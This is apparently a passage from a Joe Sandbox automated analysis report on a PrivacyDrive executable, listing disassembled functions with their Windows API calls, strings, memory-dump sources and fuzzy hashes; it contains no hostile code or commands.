                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: BIN
                                • API String ID: 3473537107-1015027815
                                • Opcode ID: 9dbd3ab9d203872fc2464589ca7f3cb3c7331685dc78100c047ace200e97a6ec
                                • Instruction ID: d1cee1dccf38ab8349605ff019cd5728398340d1e76fe9d44ad9a7f381d51279
                                • Opcode Fuzzy Hash: 9dbd3ab9d203872fc2464589ca7f3cb3c7331685dc78100c047ace200e97a6ec
                                • Instruction Fuzzy Hash: 09E06D32600B146BD2201FA6AC1CF6B7BACEBD6B23F04006AFA09C2340DA649805D771
                                Function 0051B680 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _fprintf_raise
                                • String ID: 3`C$G != NULL$R != NULL$k != NULL$modulus != NULL$src\pk\ecc\ltc_ecc_mulmod.c
                                • API String ID: 1988439158-2293699279
                                • Opcode ID: 58f5a62fdca9314fa8c133a51548f138444fce020bf68ed350cb9e58266452f5
                                • Instruction ID: 78124441466f39defdd5a8a769dfdebc8563226b7b26d451acda9988b9ebd78e
                                • Opcode Fuzzy Hash: 58f5a62fdca9314fa8c133a51548f138444fce020bf68ed350cb9e58266452f5
                                • Instruction Fuzzy Hash: 68026871D00228AFEF219B94ED84AEDBBB1FF58368F144025FC05A7260E7319D95DB90
                                Function 0043D090 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 313windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,0000060B,00000000,00000000), ref: 0043D1BD
                                • GetDriveTypeW.KERNEL32(?,<Auto>), ref: 0043D22C
                                  • Part of subcall function 004D8DA0: PostMessageW.USER32(?,0000060B,00000000,00000000), ref: 004D8DEB
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePost$DriveType
                                • String ID: :\$<Auto>
                                • API String ID: 129741658-344299042
                                • Opcode ID: b8ddd7b521215fcdb81aad0286e10ce68196148bf62929d77c5700f32a467ccd
                                • Instruction ID: 670246f387c8d48888569e4ee580ab8f7c55ca62465a6d09409616b72b2d666d
                                • Opcode Fuzzy Hash: b8ddd7b521215fcdb81aad0286e10ce68196148bf62929d77c5700f32a467ccd
                                • Instruction Fuzzy Hash: FDC1D171B043028BD71CDF28D995B6AB7E1FB99314F044A2EE8568B390E735F901CB86
                                Function 0044B630 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 313windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,0000060B,00000000,00000000), ref: 0044B75D
                                • GetDriveTypeW.KERNEL32(?,<Auto>), ref: 0044B7CC
                                  • Part of subcall function 004D8DA0: PostMessageW.USER32(?,0000060B,00000000,00000000), ref: 004D8DEB
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePost$DriveType
                                • String ID: :\$<Auto>
                                • API String ID: 129741658-344299042
                                • Opcode ID: e667c96cbd3dcbc894ac72835a70f270566adb8cc087ce17208f137fb7a18532
                                • Instruction ID: abe8a8f07e6a4767f565cdd3afb6a6e4ae45aea80453094aa552e8fe809eb480
                                • Opcode Fuzzy Hash: e667c96cbd3dcbc894ac72835a70f270566adb8cc087ce17208f137fb7a18532
                                • Instruction Fuzzy Hash: 57C1D0717046068BE71CDF28C991B6AB7E5FB95318F044A2EE8569B390E739F800CB85
                                Function 004237D0 Relevance: 5.7, Strings: 4, Instructions: 711COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception
                                • String ID: $ $invalid string position$string too long
                                • API String ID: 3728558374-2421040362
                                • Opcode ID: 3b1f94731725840e9b62b2c1c4a543a432ed2d063aae62488a6fdccc3f2e47d3
                                • Instruction ID: 494470787c36d555f456704b80f195302d1a24c544c43fcfa66fa7cc26baed73
                                • Opcode Fuzzy Hash: 3b1f94731725840e9b62b2c1c4a543a432ed2d063aae62488a6fdccc3f2e47d3
                                • Instruction Fuzzy Hash: 73529D706083509FD720CF24D884B5BBBF5BF85708F50492EF499872A1DB78E989CB5A
                                Function 00477BE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,7563D392,005BE234,00000000), ref: 00477CC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID: !@$\\?\
                                • API String ID: 1974802433-284777618
                                • Opcode ID: 9f54e74c447d8c1471aced9ddb5f856f13ca63166a6612e6d683e47195cf3d02
                                • Instruction ID: e479698cf5783f51cc95c1af72369fdedfa0ef32618485642a610c0e3e122e49
                                • Opcode Fuzzy Hash: 9f54e74c447d8c1471aced9ddb5f856f13ca63166a6612e6d683e47195cf3d02
                                • Instruction Fuzzy Hash: 2D3179B1D00208DFDB00DFA8D949BDEBBB4FF08318F10812AE415B7290E7756A48CBA5
                                Function 004A83C0 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 004A83E7
                                • _memset.LIBCMT ref: 004A8486
                                • GetVersionExW.KERNEL32(00000114,?,00000110,005BDDE8,00000000,000003B8), ref: 004A8495
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memset$Version
                                • String ID:
                                • API String ID: 4269076227-0
                                • Opcode ID: 8922782234a070395409a056d08c634cf9ebdebe735c7a74e74746dd8037a47f
                                • Instruction ID: cffd5edc1071be8adafd083d010df601be350e95cc5998e68f80b562165eefa8
                                • Opcode Fuzzy Hash: 8922782234a070395409a056d08c634cf9ebdebe735c7a74e74746dd8037a47f
                                • Instruction Fuzzy Hash: 4B213EB05017098BE724DF20D95A7DAB7F8FB04308F00459ED65A5B280DBFA2788CF94
                                Function 004C28B0 Relevance: 3.5, APIs: 2, Instructions: 549COMMON
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000,?,00571F54,00000000,?,0056C344,7563D392,7563D392,005BDD7C), ref: 004C2D7C
                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2ACF
                                  • Part of subcall function 00436AE0: WideCharToMultiByte.KERNEL32(76ECFFB0,00000000,?,000000FF,?,?,00000000,00000000,?,?,004C27B9,?,00000003,?,00583B28,00000000), ref: 00436B01
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide
                                • String ID:
                                • API String ID: 626452242-0
                                • Opcode ID: 89d3db8c149bdafcf33274edead6d687ce256ebbcfcec9e35c2dc3bc495bdc06
                                • Instruction ID: 873e9d19a2d95d0aa00dd28e92f9f7c76caf2888d9f80e7c198700b777126157
                                • Opcode Fuzzy Hash: 89d3db8c149bdafcf33274edead6d687ce256ebbcfcec9e35c2dc3bc495bdc06
                                • Instruction Fuzzy Hash: C2121639A002198BDF60DF68C945BEFBAB5AF88304F14055DD806B7381DBF45E46CBA5
                                Function 00414200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,005BE234,?,?,?,?,004B2331,?,?,005BE234,?,0040FFE5,005BE28C), ref: 00414217
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: LocalTime
                                • String ID: 1#K
                                • API String ID: 481472006-2236594636
                                • Opcode ID: 4b978a7c4557ab56677d0698089e8ae6965c50f750a790ab8a43691735895946
                                • Instruction ID: 7557a5d90c1e74fc617b9f9402ec226dbaf9c5c510acc9c2584aebe65ea47851
                                • Opcode Fuzzy Hash: 4b978a7c4557ab56677d0698089e8ae6965c50f750a790ab8a43691735895946
                                • Instruction Fuzzy Hash: ADF0A0B490021C8B8B14EF59D9440BEB7F8FF08701B00006EEC4293340EA78AA04D765
                                Function 0044AB40 Relevance: 3.2, Strings: 2, Instructions: 707COMMON
                                Download Yara Rule
                                Strings
                                • demo, xrefs: 0044AE2E
                                • XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX, xrefs: 0044AD12
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$demo
                                • API String ID: 0-3020961311
                                • Opcode ID: a4d093869b1d3facbb1607af297186a8d5a9fa8d2d69c1ecb9946b666672a5c9
                                • Instruction ID: e04dcd71fbb527aa0d6c734396308bc0a31704afe8eaa3013249135674da03c8
                                • Opcode Fuzzy Hash: a4d093869b1d3facbb1607af297186a8d5a9fa8d2d69c1ecb9946b666672a5c9
                                • Instruction Fuzzy Hash: 5C624C70604B029FE718CF29C884BA6BBE1FF88304F04465EE5A99B3A1D775F855CB85
                                Function 0040D05C Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                • RpcBindingFree.RPCRT4(005C0BE4), ref: 0040D06E
                                • LeaveCriticalSection.KERNEL32(005BE514), ref: 0040D089
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: BindingCriticalFreeLeaveSection
                                • String ID:
                                • API String ID: 638364315-0
                                • Opcode ID: c87a35ca71cc180f8364abb0b1cd667d1664c64db99ffdf2cbf6e8ee3bb5ecf9
                                • Instruction ID: bcf578403d51454ece27bc4aca4f94fa89a7d6a3adb0dc5b80eb713e033b389d
                                • Opcode Fuzzy Hash: c87a35ca71cc180f8364abb0b1cd667d1664c64db99ffdf2cbf6e8ee3bb5ecf9
                                • Instruction Fuzzy Hash: 6CE0C979904705CFC710CF94E94579EF7B0FB44325F50065ADD2553790D73568058B50
                                Function 0050709C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,7563D392,00503714,7563D06A,?,?,00000001), ref: 005070A1
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005070AA
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 942ad28fa568cb6edea065fb9ade6c034fd5d37c055d582459ec8d58653e374f
                                • Instruction ID: 8629bcc32695d4e51e11f2ecb7bbb570330ddc1db7dc1d7cfffe392459a669fe
                                • Opcode Fuzzy Hash: 942ad28fa568cb6edea065fb9ade6c034fd5d37c055d582459ec8d58653e374f
                                • Instruction Fuzzy Hash: 83B09232044B08EBCB002BA1EC19B4A3F28EB16753F408010FB0D440608B625854EBA1
                                Function 004E9350 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004E9420
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InfoParametersSystem
                                • String ID:
                                • API String ID: 3098949447-0
                                • Opcode ID: 90d7006d4c6cf24a8d7454651d94baa8d763a35c36ea1e0ff8addcd8d21a10a6
                                • Instruction ID: 693a32bdc73ec14f975cb0f373cc06dd1841639652351d9b9174d8de6b4ca397
                                • Opcode Fuzzy Hash: 90d7006d4c6cf24a8d7454651d94baa8d763a35c36ea1e0ff8addcd8d21a10a6
                                • Instruction Fuzzy Hash: 9D416D323042458BC718DF2DC891A6AB7E5FFC8315F094A6EE88ADB380DA25E904C795
                                Function 004133B0 Relevance: .9, Instructions: 896COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 27c10b9686bb60dd416154ad067708df6de77c61c0c31b68d48801038d400cb9
                                • Instruction ID: 9ee6e4bd68e5b8295504642f778b1ed85d0c47f100450ceaacabe1d5f53dacfc
                                • Opcode Fuzzy Hash: 27c10b9686bb60dd416154ad067708df6de77c61c0c31b68d48801038d400cb9
                                • Instruction Fuzzy Hash: 8472B471E1061A4FCB219E79D8413DCB7A1AFE2345F25C37BDC19B3A46E335A6858B08
                                Function 004C3850 Relevance: .2, Instructions: 180COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9e588a8d01d35eb79dcf9acaf895417c449c0edfb2f3628a6a16b90005eda23
                                • Instruction ID: 495879c96368d37ad730597c6882d90c66aaab076e0d97325b9d0c3e50125a82
                                • Opcode Fuzzy Hash: e9e588a8d01d35eb79dcf9acaf895417c449c0edfb2f3628a6a16b90005eda23
                                • Instruction Fuzzy Hash: 4281662410DBD06CCB374B7541206F7BFF15D2F20579EAADED4EA49A43C01AE64AE722
                                Function 0043C860 Relevance: 106.9, APIs: 6, Strings: 65, Instructions: 445COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0043C870
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043C888
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CREATE_VOLUME), ref: 0043C8B5
